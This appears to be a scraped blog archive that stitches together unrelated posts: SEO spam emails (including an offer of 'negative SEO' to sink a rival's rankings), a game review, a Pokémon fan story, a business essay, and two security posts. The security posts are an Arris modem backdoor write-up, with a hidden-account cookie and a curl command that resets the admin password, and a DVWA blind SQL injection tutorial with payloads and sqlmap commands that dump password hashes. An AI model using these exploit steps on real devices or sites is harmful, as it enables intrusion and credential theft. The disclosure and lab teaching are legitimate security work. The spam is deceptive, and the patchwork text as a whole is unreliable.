Rev8Grace: 2020

Monday, December 28, 2020

Get Guarnateed DA50+ for %domain%

hi there

Get an amaazing Domain Authority score above 50 for your website and
increase sales and visibility in just 30 days
https://www.str8creative.co/product/moz-da-seo-plan/

Service is guaranteed

Regards
Mike
Str8 Creative
support@str8creative.co

Wednesday, December 23, 2020

re: I need to make a website`s ranks go down

hi

Yes, it is possible, with our service here
https://negativerseo.co/

for further information please email us here
support@negativerseo.co

thanks
Peter

Sunday, December 20, 2020

Our most powerful SEO Ultimate Plan

hi there

Getting Top 10 Position in Search Engines is a Must for every Website if
you are really serious to do Online Business. If you are not in top 10 it
means you are getting only 5% of visitors for that particular keyword.^

Please find more information on our plan here:
https://str8creative.co/product/seo-ultimate/

thanks
Junita
support@str8creative.co

Wednesday, December 9, 2020

re: Rank top 5 in the Google maps

hi there

Did you know that when someone is looking for a search term on their
phones, the Gmaps listings its what pop up first in the results?

Stop losing all that visibility and let us boost your G listing into the
tops for local terms
https://www.str8creative.co/product/1500-gmaps-citations/

thanks and regards
Mike
support@str8creative.co

Tuesday, December 1, 2020

Guaranteed Domain Authority 50/100

hi there

Here is how we can do it
https://www.str8creative.co/product/moz-da-seo-plan/

Regards
Mike
Str8 Creative
support@str8creative.co

Friday, November 27, 2020

re: I need to make a website`s ranks go down

hi

Yes, it is possible, with our service here
https://negativerseo.co/

for further information please email us here
support@negativerseo.co

thanks
Peter

Monday, November 23, 2020

Cheap Monthly SEO plans %domain%

hi there

After checking your website SEO metrics and ranks, we determined that you
can get a real boost in ranks and visibility by using any of our plan below
https://www.cheapseosolutions.co/cheap-seo-packages/index.html

cheap and effective SEO plan
onpage SEO included

For the higher value plans, DA50 DR50 TF20 SEO metrics boost is inlcuded

thank you
Mike
support@cheapseosolutions.co

Wednesday, November 18, 2020

re: need unique domains backlinks

hi there

Do you mean that you want 1 backlinks from 1 domain? unique domains links
like this?

yes, we offer that here
https://str8creative.co/product/unique-domains-links/

thanks and regards
Mike
support@str8creative.co

Wednesday, October 28, 2020

re: re: Boost SEO with quality EDU backlinks

hi there

1000 Edu blog backlinks to improve your backlinks base and increase SEO
metrics and ranks
http://www.str8-creative.io/product/edu-backlinks/

Improve domain authority with more .edu blog backlinks

Unsubscribe from this newsletter
http://www.str8-creative.io/unsubscribe/

Friday, October 23, 2020

Domain Authority 50 for your website - Guaranteed Service

We`ll get your website to have Domain Authority 50 or we`ll refund you every
cent

for only 150 usd, you`ll have DA50 for your website, guaranteed

Order it today:
http://www.str8-creative.co/product/moz-da-seo-plan/

thanks
Alex Peters

Monday, October 5, 2020

re: I`m interested in your offer of Social Signals

hi
03727959950002231931noreply

Glad to hear that, here are the details below

More information here:
http://www.realsocialsignals.co/buy-social-signals/

For the best ranking results, buy Monthly basis Social signals, provided
daily, month after month:
http://www.realsocialsignals.co/custom-social-signals/

Regards
Grant

http://www.realsocialsignals.co/unsubscribe/

2018-11-9, tr, 19:37 03727959950002231931noreply
<03727959950002231931noreply@blogger.com> raše:
Hi there, Please send me the Social signals offer that we talked about over
the phone. I`m interested ^and I want to boost^ my SEO met%rics with this
new SEO method. Thanks again, will wait your reply.

Wednesday, September 30, 2020

re: Social traffic

hi
wise-woman-once-said.htmlnoreply

here it is, social website traffic:
http://www.mgdots.co/detail.php?id=113

Full details attached

Regards
Hai Howe �

Unsubscribe option is available on the footer of our website

Friday, September 25, 2020

Domain Authority 50 for your website - Guaranteed Service

Tuesday, September 22, 2020

Podcast Episode 28 - Lessons Learned And Campaign Happenings

A lot of games over the past couple of weeks, and some lessons learned as a DM! Come listen as I share about running boss battles, using random events in interesting ways and how a big reveal had me worried that I'd lost a player!

Anchor Episode link: https://anchor.fm/thedungeonmastershandbook/episodes/Episode-28---Lessons-Learned-and-Campaign-Happenings-easbbl

Leave me a voice message and let me know what you think or ask questions if you have them! (312) 625-8281‬ (US/Canada)

You can also leave a message on Anchor: anchor.fm/thedungeonmastershandbook/message

Find episode posts and other D&D content on my blog: chgowiz-games.blogspot.com

Intro music: Dragonaut by Bradley The Buyer (bit.ly/2ASpAlF)
Outro music: Dream by Wild Shores (bit.ly/2jbJehK)
Stinger music by TJ Drennon - Check out his Patreon page at https://www.patreon.com/TJD/!

Monday, September 21, 2020

Battlefield V - Review | Pro-GamersArena

Battlefield V - Review:

Battlefield V's (It's not Battlefield Vietnam which was released back in 2004) road to release hasn't actually been smooth, nor typical of an EA product. And to be honest, I didn't expected going in that playing Battlefield V's multiplayer would feel so much amazing and satisfying as Battlefield V doesn't feel like a complete experience at the launch. Battlefield V creates the impression that there's a sizeable number of modes and significant bug fixes still to be delivered. In this article, you're gonna hear from us about the Battlefield V Review.

Quick Facts:

Initial release date: 15 November 2018
First released: 20 November 2018
Engine: Frostbite
Platforms: PlayStation 4, Xbox One, Microsoft Windows

Straight away, it worth focusing on that while Battlefield V is set during WWII, it doesn't feel outdated. Mechanically speaking, it's the absolute best-feeling Battlefield in quite a while. These short stories plan to tell the stories behind the soldiers that battled in the two world wars, with Battlefield V's selection highlighting some of the more dark records of World War 2. The three being referred to bring a profound jump into the British Special Boat Section, the Norwegian resistance during the German occupation, and the efforts of black West African soldiers in their offer to overthrow the Nazi reign in France. Additionally: for better and for more worse, the game doesn't retread familiar. ground. It spins around the period's lesser-known stories and settings, which can be at the same time reviving and a bit of disappointing, particularly for 1942 fans.

Over the majority of its current multiplayer modes, Battlefield V's default mechanics step toward the hardcore. Health recovery is limited, The time to execute is reduced, and the spotting system is almost entirely removed. And keeping in mind that a portion of these changes feel like a Band-Aid being ripped off, Battlefield V is a superior shooter as a result of them. All things considered, the revisions are more thoughtful than essentially adopting the majority of the hardcore rules. And, in lieu of the whole removal of 3D spotting, just a bunch of gadgets and certain battle characteristics would now be able to put that infamous red circle over enemies heads. This change will help you remain connected with Battlefield V's stunning surroundings instead of playing the HUD. In nutshell, these changes aim to underscore teamplay, fulfilling gunplay, and immersion and every one of them find their marks.

Here's an amazing gameplay by TheRadBrad.

Also Read: Overkill's The Walking Dead - Review

Most important of all, the gun handling is fluid. Combat feels misleadingly easy, yet it's sufficiently layered to liberally reward skillful play, thoughtful strategies, or more all, teamwork. The maps are generally magnificent and advance shifted playstyles, from the flowing fields of Arras - a moment classic - to the omnipresent, all-knowing bridge of Twisted Steel. Wonderfully, every character class is impactful and enjoyable.

The incentives for coordinating with your four-person squad are borderline coercive. Lost health no longer again recovers past a specific point without a medkit, and ammo reserves are less abundant - most weapons are sustained by just two additional magazines to begin, making a Support partner an exceptionally welcome ally.

But there are many flaws which can't be neglected and need to be fixed as soon as possible like, at launch, Battlefield V was suffering from an unusually high amount of bugs and glitches which can possibly ruin a match. We've read reports of much further issues, but we ourselves have suffered with animation glitches that make pointing from turrets an impossibility, and the act of your weapon isolating from your character meaning you can't aim properly because the butt of your rifle is in your face as opposed to the iron sights. In addition, geometry in some cases neglects to stack in, leaving a church's bell tower suspended in mid-air, while trees and rocks don't show up properly, making them look like pixelated messes. The wonderful finish, however, was the point at which the 'Return to combat area' warning inaccurately showed up on our screen, which means we were killed following eight seconds for absolutely no reason. All of these issues is in all likelihood a basic fix via a patch, but they start to add up after occurring consecutively match after match to make an experience that you can't completely depend on to be reasonable nor stable.

An amazing video showing some funny glitches in Battlefield V by IGN.

Also Read: Cyberpunk 2077 | Release date, trailer, gameplay, news and more.

Battlefield V: Maps And Modes

Battlefield V offers eight maps at launch, and I felt all the maps to be quite enjoyable. Fjell 652 happens on a high-altitude Norwegian mountain overlooking the total of the Norvik map and is liable to exceptional and atmospheric snowstorms. Twisted Steel is built around a huge bridge that serves in as both a fabulous milestone and a functional mechanism to add a straight path to the map's familiar open environment speckled with rural villages.

And coming to modes, Shorter game modes, for example, Team Deathmatch, Domination, and Frontlines make up the numbers to give a multiplayer experience that will feel exceptionally familiar to returning players. Instead of update any of its online mechanics, Battlefield V refines and makes minor enhancements to the chaotic and tremendous battlegrounds it is known for. Despite everything you'll have those great Battlefield moments as you hold out against axis forces while your ticket counter drops to an alarming number, explode a rooftop to cut the rubble down onto your opponents, or you swoop in from the air and take out a target from a plane's gunner seat. There's no enormous disclosure to reveal, rather a stunningly better Battlefield experience to find.

Battlefield V: Company Coins?

Perhaps Battlefield V's greatest takeoff from what it's known for comes as its customization and cosmetic capabilities. Your Company enables you to kit out the four classes of assault, medic, support, and recon to your correct taste, with class particular weapons for each and a preposterous measure of customization to whack to finish everything. Specializations enable you to affect the stats of a weapon, choosing four of eight unique upgrades to better your odds of survival. And in addition that, you can give it an extension and add decals in five distinct territories, and after that, each weapon has its very own level progression to work through. And afterward, there's your soldier themselves, who can be kitted out with various headgear, outfits, and face paint to truly make them look like it. It's an astronomical measure of customisation, and it's everything fuelled by the in-game currency named Company Coins.

Earned by leveling up and finishing day by day orders, the money can be spent on cosmetic items for either your solider or skins for your weapons. This extends the visual abilities beyond basic unlocks via progression and enables you to pick what you need when you need it. There is no real way to buy Company Coins by means of microtransactions, however, EA has expressed that a different paid currency will be introduced at a later date.

Also Read: Days Gone | PS4 Release date, Gameplay

The Verdict:

Battlefield V is going to be an extraordinary game, of that we're certain, but because of various glaring omissions at launch and one an excessive number of glitches, the final product isn't there just yet. The good news is that fixes are already taking off, and with a year or a greater amount of free maps and modes on the way, Battlefield V can just show signs of improvement from here.

Tuesday, September 15, 2020

1500 google maps citations cheap

Rank the google maps top 5 for your money keywords, guaranteed

http://www.str8-creative.io/product/1500-gmaps-citations/

regards,
Str8 Creative

Saturday, September 12, 2020

Rescue And Recovery

I own a hobby game store but one of my other hobbies, the one that takes all my meager disposable income, is overlanding and off roading. I have been stuck many times in my Jeep. For a while, it seemed like that's what you did, drive until you got stuck. I learned a lot during this time, both about preparation and technique as well as wisdom in avoiding mistakes.

Once I tried to get up a muddy hill and slid back down sideways, nearly over an embankment. I tried several more times and slid into the exact same nook on the hill, a little closer to the edge each time. Eventually I got half way up, avoided the slide, and winched my way over the top. My friend who didn't get stuck was focused on getting me to learn how to navigate the vehicle up the hill. I just wanted to get to the top. My installer thought I was foolish to buy a winch, "I've been off-roading for 20 years and never used my winch." Well, he never went with us. I ended up using the winch several more times that year. There are some fundamentals to off-roading that apply to business.

Be prepared. In my Jeep sliding situation, I had the original, street tires on the vehicle. I had no business being in mud. A wiser me would have looked at that hill and said "Nope! We go around." In business this means having some form of reserve. A cash reserve is the most obvious. Before we had our large construction project, with tremendous debt, I had cash reserves. We would look around and try to solve problems with money, rather than seeing problems and putting them on my white board of shame, a list to be solved another day.

Being prepared also means having a plan. What would you do if you were forced to shut down for a long period of time? Would you continue the business at all? That's the first question. Is it worth it? If so, how? Having checked your resolve ahead of time means you are acting on your plan while others are searching their hearts. This is a discussion I've had with friends and family many times, and the weekend before I was shut down, we revisited this. Is it worth continuing if they shut you down?

Self rescue. Rule zero of survival is nobody is coming. Be self reliant. With rule zero in mind, how are you going to self rescue in a time of crisis? You should certainly call for help, but remember, nobody is coming. Hope they come, expect they won't. My solution was to set up an online store and do no-contact home delivery. The best time to have set up an online store was a year ago, but you do what you can in the time of crisis. In coming days, I will change that to far less profitable, but safer, shipping of all orders. Nobody is coming. I'll believe there is an outside solution when the money hits my bank account.

Call for help. Nobody is coming, but they might. I've got a ham in the Jeep, but I really want a satellite communicator. The price tag and subscription throws me off, but before every big trip, I consider it again. How remote is this trip? Who am I going with?

In the case of the business, I'm refinancing my house to acquire cash out and tapping investors for a "cash call." This alone is probably enough to self-rescue, assuming things go back to normal. They'll never be normal again. When I went to initiate a refinance, the first several days the banks were swamped and stopped publishing rates. The next week, my mortgage broker added me to her schedule. It has been three weeks and she hasn't called me back. I'm half way through a refinance with a second broker. Is it possible this falls through? Absolutely. Should I have relied on the first broker? Nobody is coming.

I'm also applying for an SBA economic injury disaster loan, and was recently approved for one. Next is the PPP payroll protection plan, which really will employ my staff for more hours than I would give them otherwise, probably building a new online store I should have created a year ago.

One of these things needs to happen. I need the mortgage refi or the SBA loan and gravy if I get both. Let's turn failure into an embarrassment of riches. Since nobody is coming, sending out a request for help on every frequency might increase my chances somebody comes. If nobody comes, the online store becomes an even hotter priority. Everyone is screwed. It is to everyones interest to be patient and allow self recovery. It's the best option since nobody is coming.

The time to be prepared with a strong resolve and resources in place, was before this happened. The time to begin the self rescue and call for help was last week. The time to accept nobody is coming and figure this out on your own is now.

Alumni, Noory Abouharous Shares His Experience Of Working In The Games Industry.

Great to have a visit from one of our Alumni this week!
Our UCLan Games Design students and lecturers enjoyed hearing about Noory Abouharous's experience of working in the industry as a designer at TT_Games :)

It was great for students to hear about the expectations and discipline of working in design and how exciting it is to work for a major games design company like TT.

Noory emphasised how important it is for students to really 'learn' from their course tutorials and practise the techniques as much as possible to progress. He explained that when working in a team, communication is key. You cannot pick who's on your team, so you must aim to interact well with all members. Scheduling is paramount when working professionally so it's good to get into the discipline of time management while you're a student.
He also shared the importance of networking and showcasing your work, to get to know others in the industry and to read books that broaden your knowledge of games and design.

Thursday, September 10, 2020

Domain Authority 50 for your website - Guaranteed Service

Friday, September 4, 2020

Tabula Rattata

You could say this all started back when I met Professor Oak in Pallet Town. My story doesn't start out much different from the stories of many other young aspiring Pokémon enthusiasts. The idea to build a Pokémon preserve and sanctuary came to me much earlier, of course, but I didn't start working on it in earnest until after a very long discussion with the original Pokémon Professor. His research on the natural relationships between humans and Pokémon, particularly his work on shared habitats and habitats in close proximity, really inspired some of my early ideas of building a park that people and Pokémon could both enjoy.
I had wanted to meet Professor Oak in person for quite some time, but travel to the Kanto region was quite expensive for me as a teenager. I was seventeen when I first read some of Professor Oak's articles in current Pokémon journals. I learned that the professor was working on a revolutionary new device that was capable of recording and studying Pokémon both in the wild and in captivity. We know this device today as the Pokédex, and back then it really ignited my budding desire to capture, catalog and build an environment in which Pokémon could thrive and people could come study or otherwise spend time with them. The Pokédex is exactly what I felt I needed to set things into motion and so I began corresponding with Professor Oak several months before we actually met in person.
Through our correspondence, the professor was more than happy to keep me up to date on his progress with the Pokédex. When it was finally ready for field testing he sent me a personal invitation to Kanto. The idea was to form a mutually beneficial relationship where I helped him test the Pokédex while he and the Pokédex itself would help me begin my arduous task that lay ahead. I spent almost all I had saved to get myself to Kanto, but it was completely worth it looking back. The Pokédex proved to be invaluable to my task, and Professor Oak himself was an amazing mentor.
The day I arrived in Pallet Town, Professor Oak and I spoke about Pokémon passionately for several hours. I understood the fundamentals of catching and battling Pokémon, of course, but the professor was shocked to know that I'd never caught or trained a Pokémon myself. During the course of our talk, he convinced me that in order to build my Pokémon Sanctuary, I would need to know all I could about Pokémon and that there was no less certain way than to begin my journey as a Pokémon Trainer. He entrusted me with one of his earliest versions of the Pokédex which was rudimentary compared to what we see nowadays, but still unbelievably advanced at the time. Then he took me out to a field just beyond the boundaries of Pallet Town where we waited patiently for an opportunity to catch my first Pokémon.
While we were sitting out in that field, Professor Oak told me that he had recently given away his last remaining Pokémon, so we would have to wait for a Pokémon significantly weakened and unable to resist capture. He also told me that if I were successful at field testing his Pokédex in Kanto, he would make sure to acquire the three beginner Pokémon that he'd recently given away to young Kanto trainers from Pallet Town. The Charmander, Squirtle and Bulbasaur native to Kanto were extremely rare and Professor Oak was one of the few ways to get ahold of such unique Pokémon. It was a rare opportunity for me to get some exclusive Pokémon into my Sanctuary when I was able to open it. Sitting there in the tall grass with Professor Oak, I knew that this was one of those important moments in my life where everything was about to change forever. I took a great risk coming to Pallet Town with my life's savings, but I would eventually leave with my first Pokémon companion and the very tool I would need to catch, catalog, study and care for every new Pokémon I could find. It felt amazing.

Now, catching that first Pokémon was not at all what I was expecting. It's safe to say that my first Pokémon was quite possibly the most feeble and sickly Rattata within three miles. We saw many healthy Pidgey and Rattata soaring through the air or scurrying through the grasses, but the professor assured me that we'd only be wasting our Pokéballs on them unless they were weakened. It was a daunting test of patience, but finally the most pathetic Rattata the world has ever known crossed our paths and was easily captured. He was scrawny and weak, but he was mine and I really did adore that little fellow. I named him Rascal and we were instant friends. Once I was armed with my own captured Pokémon and a Pokédex, Professor Oak and I parted ways. He told me to head north towards Viridian City - a bit of a sleepy hamlet compared to the cities I was used to back home. Along the way I could train Rascal and I would be able to find a gym in Viridian where I could continue the training.
Some of my toughest challenges as a trainer were those first few days with Rascal. He was honestly much too weak to face a full strength Pidgey or Rattata, so again we had to choose our battles carefully. I made sure he was well fed, rested and groomed, but actually getting battle experience and building up his strength was a tedious job. Although your first Pokémon is intended to keep you safe from wild Pokémon that have a tendency to be territorial, Rascal couldn't really protect me from much of anything on that initial trip up to Viridian City. We made our way very slowly and carefully avoiding unwanted attention. I took the time, hiding in the long grass, to sketch Rascal and wild Pokémon alike, but we did everything in our power to avoid unnecessary battles. They could have been a disastrous and premature end to my Pokémon journey.
Rascal and I did come stumbling into Viridian City sometime after dark that day, if I recall. I was broke having spent everything I had just getting to the Kanto region, but what little I did have I spent on Pokéballs and some lodging there in the city. I spent at least a week in Viridian City. Part of the reason was waiting for the Pokémon gym to reopen after a mysterious closure some time before we arrived, but part of me was also taking the time to slowly build up Rascal's strength and endurance. Alongside Rascal, I carefully studied the Rattata and Pidgey found along Route 1 which connected the city to Pallet Town. At first, Rascal could only confront other Rattata that we found alone and vulnerable, but slowly - painfully slowly - he built up enough strength to defend against healthy Rattata and Pidgey as well. It was a harrowing week of hiding and running from the strong, and building up Rascal's ability and confidence on the weak, but we managed to persevere.

Current Team:

Sunday, August 30, 2020

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"}

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this ~~bug~~ backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.

Related posts

Iranian Hackers Pose As Journalists To Trick Victims Into Installing Malware

An Iranian cyberespionage group known for targeting government, defense technology, military, and diplomacy sectors is now impersonating journalists to approach targets via LinkedIn and WhatsApp and infect their devices with malware. Detailing the new tactics of the "Charming Kitten" APT group, Israeli firm Clearsky said, "starting July 2020, we have identified a new TTP of the group,

via The Hacker News

Learning Web Pentesting With DVWA Part 3: Blind SQL Injection

In this article we are going to do the SQL Injection (Blind) challenge of DVWA.
OWASP describes Blind SQL Injection as:
"Blind SQL (Structured Query Language) injection is a type of attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.

When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query's syntax is incorrect. Blind SQL injection is nearly identical to normal , the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible."

To follow along click on the SQL Injection (Blind) navigation link. You will be presented with a page like this:

Lets first try to enter a valid User ID to see what the response looks like. Enter 1 in the User ID field and click submit. The result should look like this:

Lets call this response as valid response for the ease of reference in the rest of the article. Now lets try to enter an invalid ID to see what the response for that would be. Enter something like 1337 the response would be like this:

We will call this invalid response. Since we know both the valid and invalid response, lets try to attack the app now. We will again start with a single quote (') and see the response. The response we got back is the one which we saw when we entered the wrong User ID. This indicates that our query is either invalid or incomplete. Lets try to add an or statement to our query like this:

' or 1=1-- -

This returns a valid response. Which means our query is complete and executes without errors. Lets try to figure out the size of the query output columns like we did with the sql injection before in Learning Web Pentesting With DVWA Part 2: SQL Injection.
Enter the following in the User ID field:

' or 1=1 order by 1-- -

Again we get a valid response lets increase the number to 2.

' or 1=1 order by 2-- -

We get a valid response again lets go for 3.

' or 1=1 order by 3-- -

We get an invalid response so that confirms the size of query columns (number of columns queried by the server SQL statement) is 2.
Lets try to get some data using the blind sql injection, starting by trying to figure out the version of dbms used by the server like this:

1' and substring(version(), 1,1) = 1-- -

Since we don't see any output we have to extract data character by character. Here we are trying to guess the first character of the string returned by version() function which in my case is 1. You'll notice the output returns a valid response when we enter the query above in the input field.
Lets examine the query a bit to further understand what we are trying to accomplish. We know 1 is the valid user id and it returns a valid response, we append it to the query. Following 1, we use a single quote to end the check string. After the single quote we start to build our own query with the and conditional statement which states that the answer is true if and only if both conditions are true. Since the user id 1 exists we know the first condition of the statement is true. In the second condition, we extract first character from the version() function using the substring() function and compare it with the value of 1 and then comment out the rest of server query. Since first condition is true, if the second condition is true as well we will get a valid response back otherwise we will get an invalid response. Since my the version of mariadb installed by the docker container starts with a 1 we will get a valid response. Lets see if we will get an invalid response if we compare the first character of the string returned by the version() function to 2 like this:

1' and substring(version(),1,1) = 2-- -

And we get the invalid response. To determine the second character of the string returned by the version() function, we will write our query like this:
1' and substring(version(),2,2) = 1-- -
We get invalid response. Changing 1 to 2 then 3 and so on we get invalid response back, then we try 0 and we get a valid response back indicating the second character in the string returned by the version() function is 0. Thus we have got so for 10 as the first two characters of the database version. We can try to get the third and fourth characters of the string but as you can guess it will be time consuming. So its time to automate the boring stuff. We can automate this process in two ways. One is to use our awesome programming skills to write a program that will automate this whole thing. Another way is not to reinvent the wheel and try sqlmap. I am going to show you how to use sqlmap but you can try the first method as well, as an exercise.
Lets use sqlmap to get data from the database. Enter 1 in the User ID field and click submit.
Then copy the URL from the URL bar which should look something like this
http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit
Now open a terminal and type this command:

sqlmap --version

this will print the version of your sqlmap installation otherwise it will give an error indicating the package is not installed on your computer. If its not installed then go ahead and install it.
Now type the following command to get the names of the databases:

sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id

Here replace the PHPSESSID with your session id which you can get by right clicking on the page and then clicking inspect in your browser (Firefox here). Then click on storage tab and expand cookie to get your PHPSESSID. Also your port for dvwa web app can be different so replace the URL with yours.
The command above uses -u to specify the url to be attacked, --cookie flag specifies the user authentication cookies, and -p is used to specify the parameter of the URL that we are going to attack.
We will now dump the tables of dvwa database using sqlmap like this:

sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id -D dvwa --tables

After getting the list of tables its time to dump the columns of users table like this:

sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id -D dvwa -T users --columns

And at last we will dump the passwords column of the users table like this:

sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id -D dvwa -T users -C password --dump

Now you can see the password hashes.
As you can see automating this blind sqli using sqlmap made it simple. It would have taken us a lot of time to do this stuff manually. That's why in pentests both manual and automated testing is necessary. But its not a good idea to rely on just one of the two rather we should leverage power of both testing types to both understand and exploit the vulnerability.
By the way we could have used something like this to dump all databases and tables using this sqlmap command:

sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id --dump-all

But obviously it is time and resource consuming so we only extracted what was interested to us rather than dumping all the stuff.
Also we could have used sqlmap in the simple sql injection that we did in the previous article. As an exercise redo the SQL Injection challenge using sqlmap.

References:

1. Blind SQL Injection: https://owasp.org/www-community/attacks/Blind_SQL_Injection
2. sqlmap: http://sqlmap.org/
3. MySQL SUBSTRING() Function: https://www.w3schools.com/sql/func_mysql_substring.asp

Monday, December 28, 2020

Wednesday, December 23, 2020

Sunday, December 20, 2020

Wednesday, December 9, 2020

Tuesday, December 1, 2020

Friday, November 27, 2020

Monday, November 23, 2020

Wednesday, November 18, 2020

Wednesday, October 28, 2020

Friday, October 23, 2020

Monday, October 5, 2020

Wednesday, September 30, 2020

Friday, September 25, 2020

Tuesday, September 22, 2020

Monday, September 21, 2020

Tuesday, September 15, 2020

Saturday, September 12, 2020

Thursday, September 10, 2020

Friday, September 4, 2020

Sunday, August 30, 2020

Related news

References:

Related posts

Facebook Badge

About Me

Blog Archive

Followers